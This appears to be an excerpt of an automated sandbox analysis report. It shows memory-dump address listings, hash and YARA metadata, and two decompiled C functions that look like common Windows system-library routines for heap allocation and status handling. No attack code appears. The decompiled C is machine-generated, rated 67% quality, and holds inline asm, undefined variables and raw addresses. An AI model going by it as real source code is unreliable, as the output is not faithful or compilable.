                                                            0x048c8699
                                                            0x048c869b
                                                            0x048c8744
                                                            0x048c8748
                                                            0x048c86a1
                                                            0x048c86a1
                                                            0x048c86a1
                                                            0x048c86a4
                                                            0x048c86a8
                                                            0x04919bdf
                                                            0x04919bdf
                                                            0x048c86ae
                                                            0x048c86b0
                                                            0x00000000
                                                            0x048c86b6
                                                            0x00000000
                                                            0x04919be9
                                                            0x048c86b0
                                                            0x048c8544
                                                            0x048c854a
                                                            0x048c854d
                                                            0x048c8551
                                                            0x048c876e
                                                            0x048c8778
                                                            0x048c877b
                                                            0x048c8780
                                                            0x048c8557
                                                            0x048c8557
                                                            0x048c855d
                                                            0x048c855d
                                                            0x048c856b
                                                            0x048c856e
                                                            0x048c8570
                                                            0x048c8573
                                                            0x048c8576
                                                            0x048c8576
                                                            0x048c8579
                                                            0x048c857b
                                                            0x00000000
                                                            0x00000000
                                                            0x048c8581
                                                            0x048c85a0
                                                            0x048c85a2
                                                            0x048c85a5
                                                            0x048c85a7
                                                            0x04919b1b
                                                            0x04919b1b
                                                            0x048c862e
                                                            0x048c862e
                                                            0x048c8631
                                                            0x048c8631
                                                            0x048c8634
                                                            0x048c8636
                                                            0x048c8669
                                                            0x048c8669
                                                            0x048c866b
                                                            0x04919bbf
                                                            0x04919bc4
                                                            0x04919bc8
                                                            0x04919bce
                                                            0x04919bce
                                                            0x048c8671
                                                            0x048c8671
                                                            0x048c8674
                                                            0x048c8676
                                                            0x04919bae
                                                            0x04919bae
                                                            0x048c8676
                                                            0x048c867c
                                                            0x048c867e
                                                            0x048c8688
                                                            0x048c8688
                                                            0x00000000
                                                            0x048c867e
                                                            0x048c8638
                                                            0x048c8638
                                                            0x048c863b
                                                            0x048c863e
                                                            0x048c863f
                                                            0x048c8642
                                                            0x048c8645
                                                            0x048c8648
                                                            0x048c864d
                                                            0x04919b69
                                                            0x04919b6e
                                                            0x04919b7b
                                                            0x04919b81
                                                            0x04919b85
                                                            0x04919b89
                                                            0x04919ba7
                                                            0x04919b8b
                                                            0x04919b91
                                                            0x04919b9a
                                                            0x04919b9f
                                                            0x04919b9f
                                                            0x048c8788
                                                            0x048c878d
                                                            0x048c8763
                                                            0x048c8763
                                                            0x048c8766
                                                            0x00000000
                                                            0x048c8766
                                                            0x04919b70
                                                            0x00000000
                                                            0x04919b70
                                                            0x048c8656
                                                            0x048c865a
                                                            0x048c865c
                                                            0x048c8752
                                                            0x048c8756
                                                            0x00000000
                                                            0x00000000
                                                            0x048c875e
                                                            0x00000000
                                                            0x048c875e
                                                            0x048c8662
                                                            0x048c8662
                                                            0x048c8662
                                                            0x048c8666
                                                            0x00000000
                                                            0x048c8666
                                                            0x048c85b7
                                                            0x048c85b9
                                                            0x048c85bc
                                                            0x048c85bf
                                                            0x048c85cc
                                                            0x048c85d1
                                                            0x048c85d4
                                                            0x048c85db
                                                            0x048c85de
                                                            0x048c85e0
                                                            0x04919b5f
                                                            0x00000000
                                                            0x04919b5f
                                                            0x048c85e6
                                                            0x048c85ea
                                                            0x048c86c3
                                                            0x048c86c5
                                                            0x048c86c8
                                                            0x048c86ca
                                                            0x04919b16
                                                            0x00000000
                                                            0x04919b16
                                                            0x048c86d6
                                                            0x048c85f6
                                                            0x048c85f6
                                                            0x048c85f9
                                                            0x048c8602
                                                            0x048c8606
                                                            0x048c860a
                                                            0x048c860b
                                                            0x048c860e
                                                            0x048c8611
                                                            0x00000000
                                                            0x048c8611
                                                            0x048c85f3
                                                            0x00000000
                                                            0x048c85f3
                                                            0x048c8619
                                                            0x048c861e
                                                            0x048c861e
                                                            0x048c8621
                                                            0x048c8622
                                                            0x048c8623
                                                            0x048c8625
                                                            0x048c862c
                                                            0x00000000
                                                            0x048c873d
                                                            0x00000000
                                                            0x048c873d
                                                            0x048c8737
                                                            0x048c850f
                                                            0x048c8512
                                                            0x00000000
                                                            0x048c8512
                                                            0x00000000
                                                            0x048c84d6

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6def553728eda911d95c7a4b7a092eb237f5a7b1c8434abc07029bda73c8069b
                                                            • Instruction ID: bec012a57e3a7b16501bb3a676be7f9d5e25f333cd4738c2bc928c462052d997
                                                            • Opcode Fuzzy Hash: 6def553728eda911d95c7a4b7a092eb237f5a7b1c8434abc07029bda73c8069b
                                                            • Instruction Fuzzy Hash: CAB12AB0E40209DFDB14EF99C994AADBBB5BF44308F104A2EE505EB255E770F945CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 048E513A, Relevance: .3, Instructions: 258COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 67%
                                                            			E048E513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x49ad360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E048FD0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E048D2280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L048D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L048D4620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E048FF3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E048CFFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x49ab1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E048FB640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}































































                                                            0x048e5142
                                                            0x048e514c
                                                            0x048e5150
                                                            0x048e5157
                                                            0x048e5159
                                                            0x048e515e
                                                            0x048e5165
                                                            0x048e5169
                                                            0x048e516c
                                                            0x048e5172
                                                            0x048e5176
                                                            0x048e517a
                                                            0x048e517a
                                                            0x048e517a
                                                            0x048e517f
                                                            0x04926d8b
                                                            0x04926d8e
                                                            0x04926d91
                                                            0x04926d95
                                                            0x04926d98
                                                            0x04926d9c
                                                            0x04926da0
                                                            0x04926da3
                                                            0x04926da7
                                                            0x04926e26
                                                            0x04926e26
                                                            0x04926e2a
                                                            0x048e51f9
                                                            0x048e51f9
                                                            0x048e51fe
                                                            0x04926e33
                                                            0x04926e33
                                                            0x04926e39
                                                            0x04926e3d
                                                            0x04926e46
                                                            0x04926e50
                                                            0x00000000
                                                            0x00000000
                                                            0x04926e52
                                                            0x04926e53
                                                            0x04926e56
                                                            0x04926e5d
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x04926e5f
                                                            0x04926e67
                                                            0x04926e77
                                                            0x04926e7f
                                                            0x04926e80
                                                            0x04926e88
                                                            0x04926e90
                                                            0x04926e9f
                                                            0x04926ea5
                                                            0x04926ea9
                                                            0x04926eb1
                                                            0x04926ebf
                                                            0x00000000
                                                            0x00000000
                                                            0x04926ecf
                                                            0x04926ed3
                                                            0x00000000
                                                            0x00000000
                                                            0x04926edb
                                                            0x04926ede
                                                            0x04926ee1
                                                            0x04926ee8
                                                            0x04926eeb
                                                            0x04926eed
                                                            0x04926ef0
                                                            0x04926ef4
                                                            0x04926ef8
                                                            0x04926efc
                                                            0x00000000
                                                            0x00000000
                                                            0x04926f0d
                                                            0x04926f11
                                                            0x04926f32
                                                            0x04926f37
                                                            0x04926f3b
                                                            0x04926f3e
                                                            0x04926f41
                                                            0x04926f46
                                                            0x00000000
                                                            0x00000000
                                                            0x04926f4c
                                                            0x04926f50
                                                            0x04926f50
                                                            0x04926f54
                                                            0x04926f62
                                                            0x04926f65
                                                            0x04926f6d
                                                            0x04926f7b
                                                            0x04926f7b
                                                            0x04926f93
                                                            0x04926f98
                                                            0x04926fa0
                                                            0x04926fa6
                                                            0x04926fb3
                                                            0x04926fb6
                                                            0x04926fbf
                                                            0x04926fc1
                                                            0x04926fd5
                                                            0x04926fda
                                                            0x04926fda
                                                            0x04926fdd
                                                            0x04926fe2
                                                            0x04926fe7
                                                            0x04926feb
                                                            0x04926fef
                                                            0x04926ff3
                                                            0x048e520c
                                                            0x048e520c
                                                            0x048e520f
                                                            0x048e5215
                                                            0x048e5234
                                                            0x048e523a
                                                            0x048e523a
                                                            0x048e5244
                                                            0x048e5245
                                                            0x048e5246
                                                            0x048e5251
                                                            0x048e5251
                                                            0x04926f13
                                                            0x04926f17
                                                            0x04926f17
                                                            0x04926f18
                                                            0x04926f1b
                                                            0x04926f1f
                                                            0x04926f23
                                                            0x00000000
                                                            0x04926f28
                                                            0x048e5204
                                                            0x048e5204
                                                            0x048e5208
                                                            0x00000000
                                                            0x048e5208
                                                            0x048e5185
                                                            0x048e5188
                                                            0x048e518a
                                                            0x048e518e
                                                            0x048e5195
                                                            0x04926db1
                                                            0x04926db5
                                                            0x04926db9
                                                            0x048e519b
                                                            0x048e519b
                                                            0x048e519e
                                                            0x048e51a7
                                                            0x048e51a9
                                                            0x048e51a9
                                                            0x048e51b5
                                                            0x048e51b8
                                                            0x048e51bb
                                                            0x048e51be
                                                            0x048e51c1
                                                            0x048e51c5
                                                            0x048e51c9
                                                            0x048e51cd
                                                            0x048e51cd
                                                            0x048e51d8
                                                            0x048e51dc
                                                            0x048e51e0
                                                            0x04926dcc
                                                            0x04926dd0
                                                            0x04926dd5
                                                            0x04926ddd
                                                            0x04926de1
                                                            0x04926de1
                                                            0x04926de5
                                                            0x04926deb
                                                            0x04926df1
                                                            0x04926df7
                                                            0x04926dfd
                                                            0x04926e01
                                                            0x04926e05
                                                            0x04926e09
                                                            0x04926e0d
                                                            0x04926e11
                                                            0x04926e11
                                                            0x048e51eb
                                                            0x04926e1a
                                                            0x04926e1f
                                                            0x04926e21
                                                            0x04926e23
                                                            0x00000000
                                                            0x048e51f1
                                                            0x048e51f1
                                                            0x00000000
                                                            0x048e51f1

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 03b0cef3f57bb6fb1eb19659c020165ff945d5fc178145ebe0d6793e9212e305
                                                            • Instruction ID: aec3cc30b12e7f5d2007944be6b9cd6ecc6d2610b0cec48d27a3b5c447fa7c46
                                                            • Opcode Fuzzy Hash: 03b0cef3f57bb6fb1eb19659c020165ff945d5fc178145ebe0d6793e9212e305
                                                            • Instruction Fuzzy Hash: 6AC122756083809FD354CF28C580A6AFBF1BF89308F144A6EF9998B752D771E945CB82
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 048BC600, Relevance: .2, Instructions: 225COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 67%
                                                            			E048BC600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
				intOrPtr _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0x49ad360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E048C6D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E048FB640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t121 = _t70 + 0xc;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0x49a7b9c; // 0x0
					_t74 = L048D4620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1048);
					_push(_t116);
					_t122 = E048F9650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
										L048D77F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E048FF3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
											_t42 = _t102 + 0xc; // 0xc
											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = E048F13C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L048D77F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
				_t122 = E048F9650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}










































                                                            0x048bc608
                                                            0x048bc615
                                                            0x048bc625
                                                            0x048bc62d
                                                            0x048bc635
                                                            0x048bc640
                                                            0x048bc680
                                                            0x048bc687
                                                            0x048bc688
                                                            0x048bc689
                                                            0x048bc694
                                                            0x048bc694
                                                            0x048bc642
                                                            0x048bc64a
                                                            0x048bc697
                                                            0x04927a25
                                                            0x04927a2b
                                                            0x04927a2e
                                                            0x04927a30
                                                            0x04927bea
                                                            0x04927bea
                                                            0x00000000
                                                            0x04927bea
                                                            0x04927a36
                                                            0x04927a43
                                                            0x04927a48
                                                            0x04927a4c
                                                            0x04927a4e
                                                            0x00000000
                                                            0x00000000
                                                            0x04927a58
                                                            0x04927a5a
                                                            0x04927a5b
                                                            0x04927a5c
                                                            0x04927a5d
                                                            0x04927a63
                                                            0x04927a64
                                                            0x04927a6a
                                                            0x04927a6c
                                                            0x04927a6e
                                                            0x049279cb
                                                            0x049279cb
                                                            0x049279ce
                                                            0x049279d0
                                                            0x04927a98
                                                            0x04927a9b
                                                            0x04927a9b
                                                            0x04927a9e
                                                            0x04927aa1
                                                            0x04927bbe
                                                            0x04927bbe
                                                            0x04927bc0
                                                            0x04927be0
                                                            0x04927be0
                                                            0x04927a01
                                                            0x04927a01
                                                            0x04927a05
                                                            0x04927a07
                                                            0x04927a15
                                                            0x04927a15
                                                            0x04927a1a
                                                            0x00000000
                                                            0x04927a1a
                                                            0x04927bc2
                                                            0x04927bc6
                                                            0x04927bc9
                                                            0x04927bcd
                                                            0x04927bcf
                                                            0x049279e6
                                                            0x049279e6
                                                            0x049279eb
                                                            0x049279eb
                                                            0x049279ef
                                                            0x049279f1
                                                            0x00000000
                                                            0x00000000
                                                            0x049279f3
                                                            0x049279f5
                                                            0x049279ff
                                                            0x049279ff
                                                            0x00000000
                                                            0x049279ff
                                                            0x049279f7
                                                            0x049279fd
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x049279fd
                                                            0x04927bd5
                                                            0x04927bd8
                                                            0x00000000
                                                            0x00000000
                                                            0x04927ba9
                                                            0x04927bac
                                                            0x04927bb0
                                                            0x04927bb1
                                                            0x04927bb1
                                                            0x04927bb6
                                                            0x00000000
                                                            0x04927bb6
                                                            0x04927aa7
                                                            0x04927aaa
                                                            0x00000000
                                                            0x00000000
                                                            0x04927ab2
                                                            0x04927ab3
                                                            0x04927ab5
                                                            0x04927aec
                                                            0x04927aef
                                                            0x04927b25
                                                            0x04927b28
                                                            0x04927b62
                                                            0x04927b64
                                                            0x04927b8f
                                                            0x04927b92
                                                            0x04927b96
                                                            0x04927b98
                                                            0x00000000
                                                            0x00000000
                                                            0x04927b9e
                                                            0x04927b9f
                                                            0x04927ba3
                                                            0x00000000
                                                            0x04927ba3
                                                            0x04927b66
                                                            0x04927b68
                                                            0x04927ae2
                                                            0x04927ae2
                                                            0x00000000
                                                            0x04927ae2
                                                            0x04927b6e
                                                            0x04927b72
                                                            0x04927b75
                                                            0x04927b81
                                                            0x04927b85
                                                            0x04927b87
                                                            0x00000000
                                                            0x00000000
                                                            0x04927b31
                                                            0x04927b34
                                                            0x04927b3c
                                                            0x04927b45
                                                            0x04927b46
                                                            0x04927b4f
                                                            0x04927b51
                                                            0x04927b57
                                                            0x04927b59
                                                            0x04927b59
                                                            0x00000000
                                                            0x04927b59
                                                            0x04927b77
                                                            0x00000000
                                                            0x04927b77
                                                            0x04927b2a
                                                            0x00000000
                                                            0x04927b2a
                                                            0x04927af1
                                                            0x04927af3
                                                            0x00000000
                                                            0x00000000
                                                            0x04927afb
                                                            0x04927afc
                                                            0x04927afe
                                                            0x00000000
                                                            0x00000000
                                                            0x04927b00
                                                            0x04927b03
                                                            0x00000000
                                                            0x00000000
                                                            0x04927b05
                                                            0x04927b09
                                                            0x04927b0d
                                                            0x04927b0f
                                                            0x00000000
                                                            0x00000000
                                                            0x04927b18
                                                            0x04927b1d
                                                            0x00000000
                                                            0x04927b1d
                                                            0x04927ab7
                                                            0x04927ab9
                                                            0x00000000
                                                            0x00000000
                                                            0x04927abf
                                                            0x04927ac1
                                                            0x00000000
                                                            0x00000000
                                                            0x04927ac3
                                                            0x04927ac6
                                                            0x00000000
                                                            0x00000000
                                                            0x04927ac8
                                                            0x04927acc
                                                            0x04927ad0
                                                            0x04927ad2
                                                            0x00000000
                                                            0x00000000
                                                            0x04927adb
                                                            0x00000000
                                                            0x04927adb
                                                            0x049279d6
                                                            0x049279d9
                                                            0x049279dc
                                                            0x04927a91
                                                            0x04927a94
                                                            0x00000000
                                                            0x04927a94
                                                            0x049279e2
                                                            0x00000000
                                                            0x049279e2
                                                            0x04927a74
                                                            0x04927a7a
                                                            0x00000000
                                                            0x00000000
                                                            0x04927a8a
                                                            0x04927a21
                                                            0x04927a21
                                                            0x00000000
                                                            0x04927a21
                                                            0x048bc650
                                                            0x048bc651
                                                            0x048bc656
                                                            0x048bc65c
                                                            0x048bc65d
                                                            0x048bc663
                                                            0x048bc664
                                                            0x048bc66a
                                                            0x048bc66e
                                                            0x049279c5
                                                            0x049279c7
                                                            0x00000000
                                                            0x049279c7
                                                            0x048bc67a
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
